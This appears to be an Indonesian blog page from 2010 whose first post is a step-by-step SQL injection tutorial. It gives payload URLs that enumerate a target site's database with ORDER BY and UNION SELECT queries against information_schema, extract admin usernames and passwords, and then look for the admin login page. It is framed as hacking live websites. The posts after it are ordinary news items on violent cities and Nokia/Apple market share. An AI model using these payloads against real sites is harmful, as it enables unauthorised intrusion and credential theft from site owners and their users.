Rabu, 27 Januari 2010

Hacking Website With SQL Injection

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
Code:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:
Code:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:
Code:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


===========
=step Empat:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= step Lima: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi http://www.palembanghackerlink.com/ascii-h4.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=step Enam:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--

==============
= step Tujuh:=
==============

tahap terakhir mencari halam admin atau login .

Kota Paling Berbahaya di Dunia

Perbatasan Meksiko dengan Amerika Serikat (AS), Ciudad Juarez, tercatat sebegai kota dengan tingkat pembunuhan tertinggi di dunia. Kota yang sarat dengan perdagangan narkoba dan konflik antargeng ini, memiliki rata-rata 130 pembunuhan per 100 ribu penduduk.

Hal itu disampaikan oleh salah satu organisasi non-pemerintah Meksico, Citizen's Council for Public Security (CCSP), dalam pernyataannya seperti dilansir AFP, Kamis (27/8/2009). CCSP mendasarkan laporannya tersebut atas berita di media dan laporan FBI kepada pemerintah AS.

Di Ciudad Juarez tercatat sebanyak 1.362 orang tewas dibunuh sepanjang tahun ini hingga 21 Agustus. Jumlah ini terus meningkat karena konflik antar kartel narkotika dalam memperebutkan jalur perdagangan narkoba ke AS terus berlanjut. Penerjunan 8.500 tentara di kota perbatasan ini terbukti gagal dalam meredam konflik yang terus terjadi.

Posisi Juarez disusul oleh Caracas, Venezuela, dengan rata-rata 96 pembunuhan per 100 ribu penduduk. Pada September tahun 2008 lalu, Caracas dinobatkan sebagai kota pusat pembunuhan di dunia oleh majalah Foreign Policy, dengan rata-rata 130 pembunuhan per 100 ribu penduduk.

Selanjutnya menyusul New Orleans, AS, dengan rata-rata 95 pembunuhan per 100 ribu penduduk. Kemudian Tijuana yang juga merupakan kota perbatasan Meksiko-AS berada di peringkat ke-4 dengan rata-rata 73 pembunuhan per 100 ribu penduduk.

Sementara itu, Cape Town, Afrika Selatan, berada di peringkat ke-5 dengan 62 pembunuhan per 100 ribu penduduk. Lalu Baltimore, salah satu kota pantai timur AS, menduduki peringkat ke-8 dengan rata-rata 45 pembunuhan per 100 penduduk.

Sedangkan kota Baghdad, Irak, juga masuk dalam daftar, dengan menduduki peringkat ke-10 yang memiliki rata-rata 40 pembunuhan per 100 ribu penduduk.

Selasa, 26 Januari 2010

Nokia Indonesia Minimal Gelontorkan 20 Model

Nokia memang belum berani memastikan berapa banyak model ponsel yang akan mereka luncurkan di Indonesia. Namun menilik pengalaman tahun-tahun sebelumnya, minimal ada 20-an seri yang bakal mereka lempar ke pasar Tanah Air.

Hal itu diungkapkan Regina Hutama Poli, Corporate Communications Manager Nokia Indonesia, Kamis (14/1/2010).

"Kita (Nokia Indonesia -red.) masih belum tahu mau launching berapa banyak. Tapi paling 20-30 produk, seperti tahun-tahun kemarin," ujarnya.

Regina menjelaskan, setiap memutuskan bakal memasukkan sebuah produk baru atau tidak, Nokia selalu melihat fenomena yang tengah terjadi di pasar. Seperti apa yang tengah nge-tren, dan yang paling diinginkan konsumen. "Jadi dipengaruhi tren pasar, perkembangan di pasar seperti apa," lanjutnya.

Pun demikian, Regina menjamin bahwa meski produk terbaru vendor asal Finlandia ini terkadang suka telat masuknya ke Indonesia, namun bukan berarti tak akan menghampiri Tanah Air.

"Sebab biasanya semua produk Nokia yang beredar di global, sebagian besar juga masuk ke Asia pasifik, termasuk Indonesia pasti masuk," pungkasnya.

Nokia sendiri rencananya bakal membuka kran gelontoran ponsel mereka ke Indonesia pada Januari-Maret ini. Produk perdana yang dirilis adalah seri musik X6 dan X3. Sementara model lainnya, kita tunggu saja kejutan dari Nokia.

Apple dan Nokia Jawara Pasar Mobile Dunia

Apple dan Nokia masing-masing mengontrol pangsa pasar mobile dunia. Kedua perusahaan berbagi wilayah dominasi pasar, negara maju dan negara berkembang.

Menurut laporan AdMob pada kuartal terakhir 2009, Apple iPhone, iPod Touch, sistem operasi iPhone merajai pasar di Eropa Barat, Amerika Utara, Amerika Latin dan Oceania (Australia, Selandia Baru dan negara di dekatnya).

Sementara itu, perangkat mobile Nokia dan sistem operasi Symbian menguasai wilayah Afrika, Asia dan Eropa Timur.

AdMob yang menjual iklan melacak ponsel dan perangkat bergerak yang digunakan di area global.

Untuk skala dunia, Nokia kehilangan pasar dari Apple pada tahun 2009, dengan porsi permintaan iklan jaringan AdMob turun 18% pada kuartal keempat tahun 2009 dari angka 33% di kuartal yang sama tahun 2008.

Pada sisi yang berlawanan, porsi Apple untuk permintaan jaringan AdMob mengalami peningkatan sebesar 36% pada kuartal keempat tahun 2009 dari 9% kuartal keempat tahun sebelumnya.

Sementara itu, pembuat hanset HTC mengalami peningkatan menjadi 6% pada kuartal keempat tahun 2009 dari porsi 1% pada kuartal keempat tahun 2008, berkat penjualan luar biasa ponsel mereka yang berbasis Google Android di Amerika Utara dan Eropa Barat. Produsen BlackBerry Research In Motion tetap pada porsi angka 3%.

Meskipun ponsel pintar terhitung hanya sekitar 14% dari total jumlah penjualan perangkat mobile tahun 2009, tetapi mereka menggunakan 39% raihan trafik jaringan AdMob. Secara keseluruhan, trafik dari ponsel Android meningkat 16% pada kuartal keempat tahun 2009 dari jumlah porsi 1% tahun 2008.

Di luar wilayah spesifik pada kuartal keempat 2009, Apple di Amerika Utara memenangkan 40% porsi pasar, diikuti oleh Samsung sebesar 17% dan Motorola 11%.

Di arena sistem operasi, Android memangkas pasar Amerika Utara sebesar 27%, wilayah terbesar pengguna Android yang dilacak oleh AdMob.

Apple juga memimpin di Amerika Latin dengan 39% porsi pasar, meninggalkan Nokia dengan angka 15% dan Sony Ericsson dengan 11%.

Di Eropa Barat, perangkat Apple mengambil lahan sepertiga dari permintaan iklan yang dilacak oleh AdMob. Sementara Nokia, Samsung dan Sony Ericsson kehilangan tempat.

Di zona Oceania, Apple sekali lagi menguasai gelombang pangsa pasar, terhitung dengan mayoritas trafik yang besar terlihat oleh AdMob.

Tetapi Nokia masih merupakan firma yang merajai pojok bola dunia. Perusahaan tersebut memimpin sebagai produsen ponsel di Asia, mengambil 53% trafik AdMob di kuartal ke-empat 2009.

Di Afrika, Nokia memenangkan 54% trafik sedangkan di Eropa Timur, Nokia kehilangan sedikit porsi, tetapi masih memegang dominasi sebesar 35% pangsa pasar di kuartal keempat, diikuti oleh Apple dengan 23%.